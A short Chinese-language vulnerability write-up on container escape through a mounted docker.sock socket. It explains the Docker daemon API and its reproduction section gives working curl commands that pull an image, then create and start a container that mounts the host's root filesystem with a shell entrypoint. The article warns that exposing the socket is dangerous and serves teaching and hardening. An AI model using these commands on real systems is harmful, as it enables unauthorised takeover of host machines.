docker.sock 危险挂载逃逸
一、漏洞简介
通过本地docker.sock向宿主机部署后门容器,以控制宿主机。
二、前置知识
docker.sock
/var/run/docker.sock
是Doceker Daemon
默认监听的Unix域套接字,用于与容器中的进程通信。该监听操作的配置可以在/etc/default/docker
中找到:
-H unix:///var/run/docker.sock
向该套接字发送的HTTP请求会转发给Docker Daemon,等同于在本地控制Docker Daemon。因此,挂载了docker.sock套接字的容器权限很高。
三、漏洞利用路径
- 检查docker.sock:检查路径是否存在;发送GET请求info页面
- 拉取镜像:向docker.sock发送POST请求“create?fromImage”
- 创建容器:向docker.sock发送POST请求“containers/create”,容器通过JSON配置
- 启动容器:向docker.sock发送POST请求“containers/“+containerID+”/start”
四、漏洞复现
漏洞复现过程:
# 在挂载了/var/run/docker.sock的容器中
# 拉取镜像
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/json' \
http://<docker_host>:PORT/images/create?fromImage=alpine&tag=latest
# 创建容器并记录返回的容器ID(container_ID)
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/json' \
--data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "alpine","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' \
http://<docker_host>:PORT/containers/create
# 启动容器
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/json' \
http://<docker_host>:PORT/containers/<container_ID>/start
如果是本地利用,将<docker_host>:PORT
替换为localhost即可。
五、总结
将docker.sock暴露在容器中是很危险的行为,可能导致容器被利用来发起逃逸攻击以控制主机。本文分析了挂载docker.sock套接字的逃逸攻击原理和复现过程。